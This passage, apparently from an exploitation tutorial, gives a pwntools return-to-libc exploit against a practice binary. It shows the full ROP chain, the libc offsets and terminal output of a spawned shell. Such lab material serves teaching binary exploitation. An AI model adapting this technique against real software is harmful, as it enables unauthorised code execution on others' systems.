...
| Code Block | ||||
|---|---|---|---|---|
| ||||
from pwn import *
p = process('./ret2libc')
p.recvuntil('Printf() address : ')
stackAddr = p.recvuntil('\n')
stackAddr = int(stackAddr,16)
libcBase = stackAddr - 0x55800
sysAddr = libcBase + 0x45390
binsh = libcBase + 0x18cd57
poprdi = 0x400763
print hex(libcBase)
print hex(sysAddr)
print hex(binsh)
print hex(poprdi)
exploit = "A" * (80 - len(p64(sysAddr)))
exploit += p64(poprdi)
exploit += p64(binsh)
exploit += p64(sysAddr)
p.send(exploit)
p.interactive() |
| Code Block | ||
|---|---|---|
| ||
lazenca0x0@ubuntu:~/Exploit/RTL$ python Exploit.py [+] Starting local process './ret2libc': pid 10291 0x7f61413b6000 0x7f61413fb390 0x7f6141542d57 0x400763 [*] Switching to interactive mode $ id uid=1000(lazenca0x0) gid=1000(lazenca0x0) groups=1000(lazenca0x0),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare) $ |
...